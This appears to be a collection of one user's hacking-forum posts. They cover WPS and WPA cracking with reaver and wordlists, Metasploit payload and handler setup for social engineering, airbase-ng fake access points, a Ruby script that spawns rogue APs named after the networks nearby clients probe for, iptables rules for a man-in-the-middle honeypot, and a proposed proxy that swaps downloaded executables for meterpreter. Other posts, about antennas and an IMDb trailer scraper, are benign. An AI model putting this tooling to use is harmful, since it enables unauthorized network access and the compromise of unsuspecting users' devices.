[Word list help]

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

Try reaver... my first try was success... you ned a decent signal for this attack...

now For cracking the hash...

get the big wpa wordlist I think g0tmilk has download links on his blog... I have seen this work almost everytime... must have gpu power... purehate has good tutorials for proper driver installation...

[post your wifi router rig! mods?hacks?homebuilt?biquad?coilnear?]

I have destroyed my last wrt54g v6.... I was running some test with out a waterproof setup and now it wont broadcast...

So I have picked up a wrt54g v8 for 5$ WOot I need to splice the coax to a barrel connector and install ddwrt then ill mount one 9dbi alfa antenna on the roof and a 5dbi in our kitchen... repeater (free for life)

So what would you do with a wrt54g?

What have you done?

what firmware would you recommend?

can I install ruby and airbase-ng?

Antennas you ave built?

[SSD tips, tricks or tweaks?]

If you have worked out a solution document your work and write up some clean instuctions...

I have never followed any ssd tweeks I just did a quick install... love the ssd ;-)

[Social Engineering Attack Help]

http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html?m=1

Nice example use of msfcli !

generating a payload and setting up the exploit handler is 2 commands... try the vnc payload :-)

[Social Engineering Attack Help]

Netstat -nlp | grep 443

[Social Engineering Attack Help]

Learn how to generate the payload with msfpayload. Then start exploit/multihandler...

don't rely on others scripts.

[Packaged antenna - would this work?]

I have not attempted the yagi biquad. I have made the yagi 19 element and was unsatisfied. Each element must be positioned perfectly, if one is out of place then the rest will be useless...

So my idea of a perfect biquad yagi build would consist of each element could be sprayed with a metallic paint that is a conductor... stencil's could be made for precisely positioned elements on a plexy glass...

I still have better success with a parabolic dish and a single biquad for the driven element... I'm sure I could build one to fit in a bag you have picked...

[How do devices check for internet?]

if the network does not have internet access, try and DNS spoof all domain and IP to destination 80 on local apacheserver...

[can i root a droid with broke screen?]

I have a droid thunderbolt with a nice extended powercell. The screen is broke so I can't see anything...

My question is can I root the device with a custom rom debian server edition? Then ssh into the device and now make good use of its wifi device?

can this be done with out a working screen?

[Packaged antenna - would this work?]

Watch "Long range biquad. Home build" on YouTube

Long range biquad. Home build:

I have a few videos on some ddwrt with antenna builds. I used only things around the house. The video above is a biquad in a can and a parabolic dish HUGE gain from about 1000 feet away no lag during online gameplay

its all about the perfect parabolic dish...

[channel 6 fake ap... also airodump on same card]

iwconfig wlan0 channel 6

Ifcinfig wlan0 down

Iwconfig wlan0 mode monitor

Ifcinfig wlan up

Airbase-ng wlan0 -e test-ap-channel-6

New tab in console

Airodump-ng wlan0

So we have airodump channel Hopping and at the same time airbase is broadcasting a fake ap on channel 6...

On my linux mint everything is working as I need. My goal is to capture with airodump all client probe request and then start airbase on channel 6 with the newly captured probe request...

The problem is when I run this same commands above in kali linux. When airodump has your card in channel hop your same wlan device running airbase is also channel hopping...

Any ideas why linux mint allows me to accomplish this?

[fake ap script... not like karma? its airbase-ng]

i had to boot up kali to get a working example of a fake ap with dnsmasq...

simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html

and dont forget to add iptables to complete your clients internet connection

wlan1 is established a connection to my droid hotspot 4g network... at0 traffic will now pass threw

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

[fake ap script... not like karma? its airbase-ng]

Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives.

Labtop has 2 wifi devices. Wlan1 is connected to droid 4g 192.168.43.130

Wlan0 will be airbase-ng so should I set ifcinfig at0 192.168.44.1 up ? also how would u configure dhcp 192.168.0.100-250???

[fake ap script... not like karma? its airbase-ng]

karma was trouble to install on my machine, i didnt fill like booting bt... so here is a fake ap script... it will capture clients probe request and start a new esid...

#start airodump-ng wlan0 -w airbase
# this will simply scan airbase.csv file for client probe


@pid_list=[]# this will hold the list of running esids, "netgear", "freewifi", "cisco"
def refresh_list # read a airodump.csv file and sort threw clients
	data=File.open("airbase-01.csv","r")
	block=data.read
	cut=block.index("\r\n\r\n")
	block_1=block[146..cut] # here is your list of accespoints...
	block_2=block[cut+90..-1] # here is your list of clients 
	buff=[]

	block_2.each_line{|x| buff<< x.split(",")[5..-1]}
	buff.uniq.each{|x|
		if not x==nil

			x.each{|y|
			if not y.include?(":")
				if not y.include?("(not associated)")
					y.map(&:strip).each{|z|
						if z.size>=1
							if not @pid_list.include?(z)
							Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")}
							@pid_list<<z
							end
						end
						}
					
				end
			end
			}

		end
	}
end

refresh_list
while true
	sleep 10

	refresh_list
end

[Why is monitor mode necessary for WPS cracking?]

If I may try...

Think about a walky talky. Those hand held radio's can change channels by pressing a button...

If you and your friend have both walky talkies on channle 1 then you can share a conversation...

Your walky talkie can also channle hop. Could allow you to listen to all conversation on all channels by changing channels quickly.

If you notice when you run airodump your wifi card is channel hopping. trying to record data on all channel's

I tried :-)

Edit. misread the question..

[evilgrade style exploit... swap exe with meterpreter. mitm]

verry true. browser COOKIE=finger. I guess I was thinking fingerprint of each client lol

If finger.include?("windows")

s.puts(meterpreter.exe)

End

Just example. Above...

if anyone is interested in a team project. I made this example a few years ago... (I ment to post in community projects....)

All the code is in my head, i have no time to build this.

Packet manipulation is much needed around here

[evilgrade style exploit... swap exe with meterpreter. mitm]

Proxy source
http://pastebin.com/n7AHi5Ny

druring man in the middle, if a client downloads a executable of any kind... swap that data with meterpreter... I notice people request or ask for this kind of exploit...

Rar, zip, msi, exe etc...

maybe this community can help me build something from this proof of concept...

[My best idea ever]

Deleted sorry.

[mass fake ap... clients auto connect to saved essids]

karma is the tool i seek...

[mass fake ap... clients auto connect to saved essids]

I have found 1000 most common ssids. And my mistake for saying essids

[mass fake ap... clients auto connect to saved essids]

My phone for example will automatically connect to dd-wrt. Can a clients saved access pont be guessed?

Airbase-ng wlan0 -e dd-wrt

Is there a essid dictionary file?

Maybe what am trying to do already exist?

[What is wrong with this Ettercap filter?]

From Droid...

There are a few steps you may have to take.

Maybe set uid in ettercap config.

Enable ipfarwording per iptables or ipchains os specific.

These 2 above would help u Google search

Content-length also plays a big part when moding data, always try something simple like replace(poo for pee)

Try several webpages during your test msn, yahoo etc... Not https...

I have some proof of concept I wrote in ruby, when a user downloads a executable during mitm, the binary data is replaced with a meterpreter shell

https://vimeo.com/51230425

[automation, trailer.mp4 download from imdb,com]

#will get trailers....
#depends on apt-get install rtmpdump and wget
#set of rules for this to work... the name of the folder must be proper name as listed below, these names are also exact match from imdb

#/media/500_gig/movies/21 jump street (2012)/movie_file.avi     <--------  GOOD
#/media/500_gig/movies/21_jump_street_xvid_crap/movie_file.avi  <---   BAD

#example
#    ls /media/500_gig/movies/
#		21 Jump Street (2012)
#		antitrust (2001)
#		Avatar (2009)
#		Basketball diaries (1995)
#		be kind rewind (2008)
#		blank check (1994)
#		blow (2001)
#		buffalo soldiers (2001)

#run this script from any directory... the destination derectory must be changed below
#sudo ruby get_trailer "movie name (2000)"

Need sudo to write data to hard drive

require 'socket'
require 'cgi'
puts movie_name=ARGV[0]
dst_dir="/media/6E88F3A627ADD9B7/movies/#{movie_name}/"    #-          <--------change this
movie_name=movie_name.gsub(" ","+").chomp



s=TCPSocket.open("www.imdb.com",80)
s.print("GET /find?q=#{movie_name} HTTP/1.0\r\n\r\n")
buff=""
while line=s.gets
	buff<<line
end
s.close

#gather movie_home link 
buff=buff.gsub('"',"")
ping=buff.index("/title/")
if ping==nil
	puts"EXIT: next"
else
movie_home=buff[ping..ping+16]    # IFRAME home page / Root page crawl from starrting point
tt=buff[ping+7..ping+15]
end



s=TCPSocket.open("www.imdb.com",80)
buff1=""
s.print("GET /title/#{tt}/ HTTP/1.0\r\n\r\n")
while line=s.gets
buff1<<line
end
s.close

image_link=buff1.scan(/media.rm.*./).to_s[0..26]  # media/rm871673856/tt1232829
rm=buff1.scan(/media.rm.*./).to_s[0..26].scan(/\/.*.\//).to_s



buff2=""
s=TCPSocket.open("www.imdb.com",80)
s.print("GET /media#{rm}#{tt}/ HTTP/1.0\r\n\r\n")
while line=s.gets
buff2<<line
end
s.close



if ping=buff1.index("video/imdb/vi")
double_trailer_prevent=1
puts trailer_home=buff1[ping..ping+28]
trailer_home=trailer_home.scan(/video.imdb.vi.*.\//)



payload="GET /#{trailer_home}player?stop=0 HTTP/1.1
Host: www.imdb.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive

"

	buff3=""
	s=TCPSocket.open("www.imdb.com",80)
	s.print(payload)
	while line=s.recv(5000)
	buff3<<line
	if buff3.include?("</html>")
	break
	end
	end
	s.close


	buff3=buff3.gsub('"',"")
	ping=buff3.index("so.addVariable(file, ")
	pong=buff3.index(");",ping)
	v_file=buff3[ping+21..pong-1]
	v_file=CGI.unescape(v_file)

	if v_file.include?("rtmp")
	ping=buff3.index("so.addVariable(id, ")
	pong=buff3.index(");",ping)
	v_id=buff3[ping+19..pong-1]
	v_id=CGI.unescape(v_id)
	
	q='"'
	puts"\n"
	system("rtmpdump -r #{q}rtmp://amazonimdb.fcod.llnwd.net/a2643#{q} -a #{q}a2643#{q} -f #{q}LNX 11,2,202,243#{q} -W #{q}http://www.imdb.com/images/js/app/video/mediaplayer.swf#{q} -p #{q}http://www.imdb.com#{q} -y #{q}#{v_id}#{q} -o '#{dst_dir}trailer.flv'")
	end
end



if ping=buff1.index("video/screenplay/vi")
	if double_trailer_prevent==1
		puts "double file download attempt"
		exit
	end

puts trailer_home=buff1[ping..ping+30]
trailer_home=trailer_home.scan(/video.screenplay.vi.*.\//)

payload="GET /#{trailer_home}player?stop=0 HTTP/1.1
Host: www.imdb.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive

"

	buff3=""
	s=TCPSocket.open("www.imdb.com",80)
	s.print(payload)
	while line=s.recv(5000)
	buff3<<line
	if buff3.include?("</html>")
	break
	end
	end
	s.close


	buff3=buff3.gsub('"',"")
	ping=buff3.index("so.addVariable(file, ")
	pong=buff3.index(");",ping)
	v_file=buff3[ping+21..pong-1]
	v_file=CGI.unescape(v_file)

	
	
	if v_file.include?("http")
	puts"\n"
	system("wget '#{v_file}' -O '#{dst_dir}trailer.flv'")
	end
end

So, its ugly... dont judge me... it was sucessfull 95% (wrong name = fail, or trailer does not exist)

there is no error checking... now to process a hole list will take another small script...

irb mode...

data=`ls /media/500_gig/movies/`
for movie_name in data.map
system("ruby get_trailer.rb 'movie_name.chomp'")
end

Now i hope to get some help with a template for the site... i just want to scrole threw a list of images like netflix... can some one contribute?

im verry noob with building a webpage... so maybe some decent example code would be apriceated...

[automation, trailer.mp4 download from imdb,com]

Droid response,

That is the easy download, I was sucessful lastnight with downloading RTMP stream :-) I got everything on order now just need to mod my script then launch

[automation, trailer.mp4 download from imdb,com]

(first post was from a droid so was quick_ now i have example to share)

i have been using wireshark, tcpick, burp to investigate my way threw traffic and this is a working download request... you can try if you like or take my work for it...

nc  progressive.totaleclips.com.edgesuite.net > out.mp4

GET /127/e12782_301.mp4?eclipId=e12782&bitrateId=471&vendorId=102&type=.mp4&sp_ubid=746-5916787-1173752 HTTP/1.1
Host: progressive.totaleclips.com.edgesuite.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.imdb.com/images/js/app/video/mediaplayer.swf

(working on some examples for another reply)